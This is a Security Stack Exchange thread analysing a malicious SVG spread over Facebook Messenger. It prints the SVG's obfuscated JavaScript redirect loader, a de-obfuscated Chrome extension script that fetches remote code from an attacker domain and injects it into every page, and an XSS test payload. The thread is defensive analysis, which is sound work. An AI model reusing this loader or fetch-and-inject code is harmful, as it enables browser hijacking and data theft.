16

What is this file attempting to do?

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
    function jxnpgmlk(wvdxrc,lecho,jqgws){
      var uxheu = "aC3YP1J7t?2R.o_gN0/5Fevz:b9ilEnjxmXTLK6dr8GpASs4IyDZk=hUVHfOcBuM";
      var uahflv = ["jfTiENZCUKG=Dtxuh.Fvr_?0X9mlJa4sRHkbnY26P1Iyc\/OVM:dLg7oBpA8eSz53","M0:ARfNp1cv\/bosBHlYxn.8Ok9T7IJ6GeEi3y5tmVUgKzDhur4PLC?2a_=XFdZSj","aKEd.eMR1bZ8rzm4tfuhn0Pp3xHI9AXg?Dv_cUVy2FLTlYoSGk:BN5\/=JOij7s6C","Iu2b=zPK0\/7vrj1LEARtcnUkShmG3J_.DNo46fCHXBx?i8s:T5ZepYgadOylMFV9"];
      var gzzxb = "";
      var jfort = 0;
      while(uahflv[jfort]){
        jfort++;
      }
      var xlmjv = 0;
      while(wvdxrc[xlmjv]){
        var uxqpon = 0;
        var aljmjv = -1;
        while(uxheu[uxqpon]){
          if(uxheu[uxqpon] == wvdxrc[xlmjv]){
            aljmjv = uxqpon;
            break;
          }
          uxqpon++;
        }
        if(aljmjv >= 0){
          var sqakm = 0;
          var ehtbzd = -1;
          while(uahflv[xlmjv%jfort][sqakm]){
            if(uahflv[xlmjv%jfort][sqakm] == wvdxrc[xlmjv]){
              ehtbzd = sqakm;
              break;
            }
          sqakm++;
          }
          gzzxb += uxheu[ehtbzd];
        }else{
          gzzxb += wvdxrc[xlmjv];
        }
        xlmjv++;
      }
      var swidsm = "";
      for(yokncr=lecho;yokncr<gzzxb.length;yokncr++){
        swidsm += gzzxb[yokncr];
      }
      gzzxb = swidsm;
      return gzzxb;
    }
  var yaqjv = window;
  var cujnl = jxnpgmlk("OEoqu71jy",6,true);
  var gnqrek = jxnpgmlk("_9Npy9P5tSxq?Ca3tda0loX",15,false);
  var zvlgj = jxnpgmlk("66/X_X",2,true);
  yaqjv[cujnl][gnqrek][zvlgj] = jxnpgmlk("R./0UK3RFEzVP7yrSoDRy2TRUV6sUbTgy",2,true);
  ]]></script>
</svg>
Arminius
  • 44,242
  • 14
  • 143
  • 138
Jmanhouss
  • 169
  • 1
  • 1
  • 5
  • Saw an explanation here: http://www.bleepingcomputer.com/forums/t/632614/facebook-svg-file-transfering/ – Lauri Elias Nov 20 '16 at 22:34
  • Ive read that already but kinda confused. So its purpose is to forward itself to everyone on your contacts list? The person who originally opened this " photo.svg " file sent it to everyone on there facebook messenger. According to this post on bleeping , it's not really " doing anything " asside from maybe trying to hjack HTTP variables , IP adresses? Im no computer wizz here , just curious lol – Jmanhouss Nov 20 '16 at 22:40
  • Says here the site attempts to install virus-like extensions: http://daubao.com/canh-giac-voi-dang-virus-facebook-moi-spam-hinh-anh-co-chua-ma-doc-cho-ban-be/cong-nghe/550040.html – Lauri Elias Nov 20 '16 at 22:50
  • I guess a better question is , if someone opened this.. Like i did , i executed it in a browser before opening it with code visual studio , and it loads up to an image of a red circle.. which i see now.. "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> What type of action should i or other take to avoid infection? Simple scans ? – Jmanhouss Nov 20 '16 at 22:55
  • Unfortunately, we are not a malware code review site. – schroeder Nov 21 '16 at 07:44

3 Answers3

42

This file is part of a virus.

It's an SVG image file containing obfuscated JS code that redirects you to a malicious website. This website will attempt to install malware (a Chrome browser plugin) and forward the SVG file to your Facebook contacts. If you think you got infected, follow these instructions: Help! My home PC has been infected by a virus! What do I do now?

Quick Analysis

The attacker likely chose an SVG file because it's an innocent-looking image format and less suspicious than executables or HTML files (whose transfer is also prohibited by Facebook). But despite being graphics, SVGs can also contain active script code.

The file itself contains an obfuscated inline <script> segment consisting of two parts. The first part is the function jxnpgmlk() which acts as a decoder that unscrambles any strings that it gets as input. The exact algorithm doesn't really matter because we can simply apply the function on any scrambled strings. The second part is a very short payload. The few strings defined here can simply be unscrambled by using the decoding function, resulting in this:

var cujnl = "top";
var gnqrek = "location";
var zvlgj = "href";
window[cujnl][gnqrek][zvlgj] = "http://mourid.com/php/trust.php";

So essentially, all this code does is redirect you to http://mourid.com/php/trust.php.

From there, two more 302 redirects follow to http://kerman.pw/php/trust.php and http://kerman.pw/?fb_dsa. The final page fakes the look of a Youtube video page to deceive users into installing a supposedly "missing codec". You will instead be prompted to install this malicious Chrome extension called "One":

https://chrome.google.com/webstore/detail/one/olonepdliekllagcdgmlbihgcplinegj
Edit: Google finally removed the extension from the Chrome Web Store but there might still be other instances around.

I manually downloaded the extension file and had a quick look at the obfuscated source code. The extension manifest defines several background scripts that immediately get loaded once installed. This is the essential part of what I de-obfuscated:

this["fetch"]("http://cerawa.pw/manalovuci/kojakumoda.bg")["then"](function(kkuruv) {
    if (kkuruv["ok"]) {
        kkuruv["blob"]()["then"](function(yxbnjo) {
            var pklimw = this["URL"]["createObjectURL"](yxbnjo);
            var yxyiq = this["document"]["createElement"]("script");
            yxyiq["src"] = pklimw;
            this["document"]["head"]["appendChild"](yxyiq);
        });
    }
});

As you can see the extension downloads additional JS code from http://cerawa.pw/manalovuci/kojakumoda.bg. (Note that the page won't return anything if you don't send a Chrome user agent.) That response is turned into an object URL and attached to every document while browsing, effectively giving the attacker remote control over your browsing session.


It seems that the malware can be triggered by user interaction only, so if you didn't install the extension you are probably safe. But since the page can easily serve different malware to different user agents or different countries, it's not possible to be absolutely sure that you didn't get infected while visiting the site. If in doubt, it's time to nuke it from orbit.

Bonus: Funnily, that page is also vulnerable to XSS. But I guess they don't have a Bug Bounty Program in place... (http://kerman.pw/"><script>alert(1)</script>).

Arminius
  • 44,242
  • 14
  • 143
  • 138
  • Thank you for that explanation , i understand now. Like ive said before my PC knowledge isnt very advanced but im always super curious on what things like this are scripted for. Thanks again. – Jmanhouss Nov 20 '16 at 23:34
  • This is very interesting... some knowledgable people here. – Jmanhouss Nov 21 '16 at 00:20
  • 1
    Should that extension be reported? Google is generally pretty strict about allowing malware on their stores. – Xiong Chiamiov Nov 21 '16 at 04:11
  • @XiongChiamiov Yes, it should be reported. – Arminius Nov 21 '16 at 04:12
  • 3
    Interestingly, we can only expect more of these, as Chrome is now the most widely used browser on the Internet, having more market share than all other browsers *combined*. – phyrfox Nov 21 '16 at 04:15
  • 1
    +1 for the detailed info. One thing though, Everything up to this point, including the extension must operate within the confines of the browser's sandbox. I came here from a site that claims it can install ransomware. How does it do so with the sandbox constraints? There should be no automatable way to install software that runs outside of the sandbox, using the operating system's file API's. Any idea how this last step is achieved? – Richard B Nov 22 '16 at 03:42
  • 1
    @RichardB That's indeed a little unclear. Facebook said in a statement: "In our investigation, we determined that these were not in fact installing Locky malware—rather, they were associated with Chrome extensions." It would likely need further user interaction to get the ransomware set up. – Arminius Nov 22 '16 at 04:02
9

I got this "wonderful" thing too, and I played a bit with it. Turns out, it only activates when you are using "Chrome", because it tries to install and extension called "One", which is the darn virus. If you open it with any other browser ( Opera, Firefox, Edge, IE, Safari E.T.C.), you will get only the white page, nothing will happen.

I think, that the main essence from the virus is the extension, because then it tries to steal your data from Facebook. When you open it in chrome, it looks like this: Picture from Chrome

If you click "Add extension", you get infected, it redirects to facebook. At this point, you should immediately close Chrome and uninstall it. OR you can open extensions tab and delete extension called "One", but I don't think it removes it completely.

After removing it, I suggest changing Facebook password and logging out from all the other instances. (Facebook offers an option to do so.)

3

The code tries to redirect your browser to another website. The URL is kind of encrypted in the string variables within the javascript code.

If you visit a website that embeds this svg image, it will immediately redirect to the - probably malicious - website. In order to defend against Javascript redirects, you can disable Javascript in your browser.


/**
* @param string ar
* @param {number} opt_attributes
* @param {boolean} recurring (unused)
* @return string
*/
function theMethod(ar, opt_attributes, recurring) {
    /** @type {string} */
    var a = "aC3YP1J7t?2R.o_gN0/5Fevz:b9ilEnjxmXTLK6dr8GpASs4IyDZk=hUVHfOcBuM";
    /** @type {Array} */
    var encrypted = ["jfTiENZCUKG=Dtxuh.Fvr_?0X9mlJa4sRHkbnY26P1Iyc/OVM:dLg7oBpA8eSz53", "M0:ARfNp1cv/bosBHlYxn.8Ok9T7IJ6GeEi3y5tmVUgKzDhur4PLC?2a_=XFdZSj", "aKEd.eMR1bZ8rzm4tfuhn0Pp3xHI9AXg?Dv_cUVy2FLTlYoSGk:BN5/=JOij7s6C", "Iu2b=zPK0/7vrj1LEARtcnUkShmG3J_.DNo46fCHXBx?i8s:T5ZepYgadOylMFV9"];
    var s = "";
    var n = encrypted.length; //
    var i = 0;

    // loop over the first argument
    for (;ar[i];) {
        var mid = 0;
        var high = -1;
        // get the index of the current character in the variable "a"
        for (;a[mid];) {
            if (a[mid] == ar[i]) {
                /** @type {number} */
                high = mid;
                break;
            }
            mid++;
        }
        // if we found the charachter in the variable "a"
        if (high >= 0) {
            var j = 0;
            var x = -1;
            for (;encrypted[i % n][j];) {
                if (encrypted[i % n][j] == ar[i]) {
                    x = j;
                    break;
                }
                j++;
            }
            // append char to solution
            s += a[x];
        } else {
            // append char to solution
            s += ar[i];
        }
        i++;
    }
    /** @type {string} */
    var u = "";
    /** @type {number} */
    aNumber = opt_attributes;
    for (;aNumber < s.length;aNumber++) {
        u += s[aNumber];
    }
    s = u;
    return s;
}
/** @type {Window} */
var cujnl = theMethod("OEoqu71jy", 6, true); // top
var gnqrek = theMethod("_9Npy9P5tSxq?Ca3tda0loX", 15, false); // location
var zvlgj = theMethod("66/X_X", 2, true); // href
window[cujnl][gnqrek][zvlgj] = theMethod("R./0UK3RFEzVP7yrSoDRy2TRUV6sUbTgy", 2, true); // the malicious URL
Stefan Braun
  • 806
  • 6
  • 10